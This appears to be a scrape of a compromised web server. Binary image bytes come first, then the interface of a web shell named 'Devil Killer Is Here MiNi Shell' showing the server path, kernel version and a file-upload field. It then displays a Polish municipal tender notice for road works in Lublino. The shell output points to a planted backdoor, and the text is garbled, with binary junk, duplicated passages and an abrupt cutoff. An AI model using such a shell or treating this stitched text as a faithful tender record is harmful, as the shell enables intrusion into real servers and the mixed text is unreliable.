JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240611/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240611/0036129301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja drogi w miejscowości Lublino. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Chociwel</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 811685680</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Armii Krajowej 52</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chociwel</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">73-120</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL428 - Szczeciński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@chociwel.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.chociwel.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja drogi w miejscowości Lublino. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-95987617-27e7-11ef-a458-c2a7c3d67e03</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00361293</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00069826/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Modernizacja drogi w miejscowości Lublino.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.chociwel.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://oneplace.marketplanet.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W przedmiotowym postępowaniu o<br/>udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, wniosków,<br/>zawiadomień oraz przekazanie informacji odbywa się elektronicznie za pośrednictwem platformy Zamawiającego platformy<br/>zakupowej oneplace.marketplanet.pl https://oneplace.marketplanet.pl. 2. W sytuacjach awaryjnych Platformy lub przerwy technicznej<br/>działania systemu Zamawiający dopuszcza możliwość komunikowania przy użyciu poczty elektronicznej:zamowienia@chociwel.pl z<br/>zastrzeżeniem, iż oferty mogą zostać przekazane wyłącznie za pomocą poniższej Platformy. Instrukcja dla Wykonawców znajduje<br/>się na stronie Urzędu Miejskiego Chociwlu - BIP - zamówienia publiczne -wszczęte postępowania</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://oneplace.marketplanet.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">https://oneplace.marketplanet.pl</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z art.13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZPU.TP.271.2.9.2024.IJ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest przebudowa drogi w miejscowości Lublino, inwestycja dofinasowana jest z Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych. <br/><br/>Inwestycja obejmuje działki oznaczone numerami ewidencyjnymi: 92/1 oraz 107 obręb Lublino, gmina Chociwel, na odcinku - Etap II projektu budowlanego od 0+070,00 do 0+3128,50 o projektowanej jezdni o szerokości 3,0 - 5,0m o nawierzchni z betonu asfaltowego i mieszanek smołowych. Istniejące zjazdy do posesji o nawierzchni betonowej, z kostki kamiennej, kostki betonowej oraz gruntowe. Droga klasy D – przekrój 1/2.<br/><br/>Szczegółowy opis przedmiotu zamówienia zapisany w załączniku numer 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233150-5 - Roboty w zakresie regulacji ruchu</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233223-8 - Wymiana nawierzchni drogowej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie kierował się następującymi kryteriami oceny:<br/>1) Cena (C) – waga kryterium (WC) 60 %<br/>Ocena punktowa w ramach kryterium zgodnie ze wzorem:<br/>najniższa zaoferowana cena<br/>C = ------------------------------------------ x 60 pkt.<br/>cena zaoferowana w badanej ofercie<br/>C – całkowita liczba punktów przyznanych danej ofercie w kryterium „cena”<br/>Po uwzględnieniu wagi Wykonawca może uzyskać w tym kryterium maksymalnie 60 pkt.<br/>2) Kryterium „Okres gwarancji na wykonane roboty w tym wbudowane materiały” (Grb) – waga 40 %<br/>Ocena dokonana zostanie na podstawie okresu gwarancji na wykonane roboty budowlane w tym wbudowane materiały podanego w<br/>pełnych latach – zadeklarowanego przez Wykonawcę w Formularzu oferty.<br/>Okres gwarancji na roboty budowlane w latach Ilość punktów<br/>(Grb)<br/>3 10<br/>4 20<br/>5 40<br/>Ocena dokonana zostanie na podstawie okresu gwarancji jakości wykonanych robót budowlanych podanego w latach –<br/>zadeklarowanego przez Wykonawcę w Formularzu oferty.<br/>Najkrótszy możliwy okres gwarancji dopuszczony przez Zamawiającego: G min = 3 lata liczonego od dnia podpisania przez<br/>Zamawiającego protokołu bezusterkowego odbioru końcowego robót. Najdłuższy możliwy okres gwarancji przyjęty do oceny oferty<br/>przez Zamawiającego: Grb max = 5 lat liczonego od dnia podpisania przez Zamawiającego protokołu bezusterkowego odbioru<br/>końcowego robót.<br/>W przypadku gdy Wykonawca nie poda okresu gwarancji Zamawiający przyjmie do oceny oferty minimalny okres gwarancji, czyli 3<br/>lata i taki okres zostanie przyjęty do umowy.<br/>W przypadku gdy Wykonawca poda okres gwarancji większy niż 5 lat, Zamawiający przyjmie do oceny oferty maksymalny okres<br/>gwarancji.<br/>W przypadku gdy Wykonawca poda okres gwarancji w niepełnych latach<br/>lub w miesiącach, Zamawiający przyjmie do umowy okres gwarancji podany w przez Wykonawcę, natomiast do oceny oferty 1. Przy wyborze oferty Zamawiający będzie kierował się następującymi kryteriami oceny:<br/>1) Cena (C) – waga kryterium (WC) 60 %<br/>Ocena punktowa w ramach kryterium zgodnie ze wzorem:<br/>najniższa zaoferowana cena<br/>C = ------------------------------------------ x 60 pkt.<br/>cena zaoferowana w badanej ofercie<br/>C – całkowita liczba punktów przyznanych danej ofercie w kryterium „cena”<br/>Po uwzględnieniu wagi Wykonawca może uzyskać w tym kryterium maksymalnie 60 pkt.<br/>2) Kryterium „Okres gwarancji na wykonane roboty w tym wbudowane materiały” (Grb) – waga 40 %<br/>Ocena dokonana zostanie na podstawie okresu gwarancji na wykonane roboty budowlane w tym wbudowane materiały podanego w<br/>pełnych latach – zadeklarowanego przez Wykonawcę w Formularzu oferty.<br/>Okres gwarancji na roboty budowlane w latach Ilość punktów<br/>(Grb)<br/>3 10<br/>4 20<br/>5 40<br/>Ocena dokonana zostanie na podstawie okresu gwarancji jakości wykonanych robót budowlanych podanego w latach –<br/>zadeklarowanego przez Wykonawcę w Formularzu oferty.<br/>Najkrótszy możliwy okres gwarancji dopuszczony przez Zamawiającego: G min = 3 lata liczonego od dnia podpisania przez<br/>Zamawiającego protokołu bezusterkowego odbioru końcowego robót. Najdłuższy możliwy okres gwarancji przyjęty do oceny oferty<br/>przez Zamawiającego: Grb max = 5 lat liczonego od dnia podpisania przez Zamawiającego protokołu bezusterkowego odbioru<br/>końcowego robót.<br/>W przypadku gdy Wykonawca nie poda okresu gwarancji Zamawiający przyjmie do oceny oferty minimalny okres gwarancji, czyli 3<br/>lata i taki okres zostanie przyjęty do umowy.<br/>W przypadku gdy Wykonawca poda okres gwarancji większy niż 5 lat, Zamawiający przyjmie do oceny oferty maksymalny okres<br/>gwarancji.<br/>W przypadku gdy Wykonawca poda okres gwarancji w niepełnych latach<br/>lub w miesiącach, Zamawiający przyjmie do umowy okres gwarancji podany w przez Wykonawcę, natomiast do oceny oferty</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na wykonane roboty budowlane w tym wbudowane materiały.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach<br/>określonych w Rozdziale 17 SWZ oraz którzy spełniają warunki udziału w postępowaniu w zakresie:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia w tym zakresie wymagań.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia w tym zakresie wymagań.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że posiada zdolność kredytową lub środki finansowe w<br/>wysokości co najmniej 2 000 000,00 zł.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia powyższy warunek Wykonawcy mogą<br/>spełnić łącznie.<br/>Uwaga: W przypadku, gdy jakakolwiek wartość dotycząca ww. warunku udziału<br/>w postępowaniu wyrażona będzie w walucie obcej, Zamawiający przeliczy tę wartość<br/>w oparciu o średni kurs walut NBP dla danej waluty z daty wszczęcia postępowania<br/>o udzielenie zamówienia publicznego (za datę wszczęcia postępowania uznaje się datę zamieszczenia ogłoszenia o<br/>zamówieniu w Biuletynie Zamówień Publicznych). Jeżeli<br/>w tym dniu nie będzie opublikowany średni kurs NBP, Zamawiający przyjmie kurs średni z ostatniej tabeli przed wszczęciem<br/>postępowania.<br/>4) zdolności technicznej lub zawodowej:<br/>Zamawiający uzna, że Wykonawca posiada wymagane zdolności techniczne<br/>lub zawodowe zapewniające należyte wykonanie zamówienia, jeżeli Wykonawca wykaże, że:<br/>a) wykonał (zakończył) należycie w okresie ostatnich 5 lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej: jedną robotę budowlaną polegającą na budowie / przebudowie /<br/>rozbudowie drogi o nawierzchni bitumicznej o powierzchni min. 4000 m2 wraz<br/>z pełną infrastrukturą.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia powyższy warunek musi spełnić co najmniej<br/>jeden z Wykonawców w całości.<br/>b) będzie dysponować osobami zdolnymi do wykonania zamówienia, tj.:<br/>- co najmniej jedną osobą na stanowisko: Kierownika Budowy<br/>Wymagane uprawnienia:<br/>uprawnienia do pełnienia funkcji technicznych w budownictwie, tj. do kierowania robotami budowlanymi w specjalności<br/>drogowej bez ograniczeń.<br/>Wymagane doświadczenie:<br/>posiada co najmniej 3 – letnie doświadczenie zawodowe w kierowaniu robotami budowlanymi jako kierownik budowy / robót,<br/>w tym uczestniczył jako kierownik budowy / robót przy realizacji zadania inwestycyjnego polegającego na budowie /<br/>przebudowie / rozbudowie dróg o nawierzchni bitumicznej o powierzchni min. 4000 m2.<br/>Zamawiający uzna odpowiadające wyżej wymienionym warunkom i równoważne im uprawnienia budowlane wydane na<br/>podstawie wcześniej obowiązujących przepisów, jeżeli będą potwierdzać zakres uprawnień osoby na stanowisko kierownika<br/>budowy / robót oraz pozwalać na wykonanie przedmiotu zamówienia.<br/>Wykonawca składający ofertę zobowiązuje się w przypadku podpisania umowy, do skierowania do pracy osoby<br/>odpowiadającej wyżej wskazanym wymogom.<br/>W przypadkach losowych wykluczających pracę osoby wskazanej w ofercie Wykonawca będzie zobowiązany do<br/>zatrudnienia osoby o kwalifikacjach zawodowych, doświadczeniu i wykształceniu odpowiadającym warunkom SWZ.<br/>W celu uniknięcia wątpliwości prosi się o podanie daty wydania uprawnień i dokładne cytowanie zakresu uprawnień z<br/>posiadanego zaświadczenia.<br/>Wykonawca zobowiązany jest również zapewnić odpowiedni skład osobowy, niezbędny do właściwego zrealizowania<br/>przedmiotu zamówienia.<br/>UWAGA:<br/>Na podstawie art. 104 ustawy z dnia 7 lipca 1994 r. Prawo budowlane osoby, które przed dniem wejścia w życie ustawy,<br/>uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych<br/>funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. Zakres<br/>uprawnień budowlanych należy odczytywać zgodnie z treścią decyzji o ich nadaniu w oparciu o przepisy będące podstawą<br/>ich nadania. Ponadto, zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie,<br/>określone w art. 12 ust. 1 ustawy Prawo budowlane, mogą również wykonywać osoby, których odpowiednie kwalifikacje<br/>zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. W związku z powyższym, Zamawiający<br/>zaakceptuje uprawnienia budowlane odpowiadające uprawnieniom wymaganym przez Zamawiającego, które zostały<br/>wydane na podstawie wcześniej obowiązujących przepisów oraz zagraniczne uprawnienie uznane w zakresie i na zasadach<br/>opisanych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej.<br/>2. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu wg formuły spełnia – nie spełnia w oparciu o<br/>wymagane w Rozdziale 20 SWZ dokumenty. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu wstępnego potwierdzenia, że Wykonawca:<br/>1)spełnia warunki udziału w postępowaniu określone w Rozdziale 18 ust. 1 Wykonawca dołącza do oferty aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu (wg wzoru - załącznik nr 3 do SWZ).<br/>Oświadczenie musi być złożone w oryginale.W przypadku składania oferty wspólnej oświadczenie składa każdy z Wykonawców ubiegających się o zamówienie, w zakresie, w jakim wykazuje spełnianie warunków udziału w postępowaniu.<br/>2)nie podlega wykluczeniu, z powodów określonych w Rozdziale 17 ust. 1 Wykonawca zobowiązany jest dołączyć do oferty aktualne na dzień składania ofert oświadczenie wstępne o niepodleganiu wykluczeniu z udziału w postępowaniu (wg wzoru – załącznik nr 4 do SWZ)Oświadczenie musi być złożone w oryginale.<br/>W przypadku składania oferty wspólnej oświadczenie składa każdy z Wykonawców ubiegających się o zamówienie.<br/>2.<br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawi, wraz z oświadczeniami, o których mowa powyżej, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby (Załącznik nr 6 do SWZ).<br/>3.Oświadczenia, o których mowa w ust. 1 i 2 tymczasowo zastępują wymagane przez Zamawiającego podmiotowe środki dowodowe.<br/>4.Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień ich złożenia, chyba że Zamawiający jest w posiadaniu lub ma dostęp do tych podmiotowych środków dowodowych, a Wykonawca wskaże te środki oraz potwierdzi ich poprawność i aktualność. Podmiotowe środki dowodowe składane na wezwanie Zamawiającego na potwierdzenie, szczegółowy opis podmiotowych środków dowodowych zapisany został w rozdziale 22 SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W celu wstępnego<br/>potwierdzenia, że Wykonawca:<br/>1) spełnia warunki udziału w postępowaniu określone w Rozdziale 18 ust. 1 Wykonawca dołącza do oferty aktualne na dzień<br/>składania ofert oświadczenie<br/>o spełnianiu warunków udziału w postępowaniu (wg wzoru - załącznik nr 3<br/>do SWZ).<br/>Oświadczenie musi być złożone w oryginale.<br/>W przypadku składania oferty wspólnej oświadczenie składa każdy z Wykonawców ubiegających się o zamówienie, w zakresie, w<br/>jakim wykazuje spełnianie warunków udziału w postępowaniu.<br/>2) nie podlega wykluczeniu, z powodów określonych w Rozdziale 17 ust. 1 Wykonawca zobowiązany jest dołączyć do oferty<br/>aktualne na dzień składania ofert oświadczenie wstępne o niepodleganiu wykluczeniu z udziału w postępowaniu (wg wzoru –<br/>załącznik nr 4 do SWZ)<br/>Oświadczenie musi być złożone w oryginale.<br/>W przypadku składania oferty wspólnej oświadczenie składa każdy z Wykonawców ubiegających się o zamówienie.<br/>2. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawi, wraz z<br/>oświadczeniami, o których mowa powyżej, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca<br/>powołuje się na jego zasoby (Załącznik nr 6 do SWZ).<br/>3. Oświadczenia, o których mowa w ust. 1 i 2 tymczasowo zastępują wymagane przez Zamawiającego podmiotowe środki<br/>dowodowe.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający wymaga złożenia przedmiotowych środków dowodowych wraz z ofertą, tj. 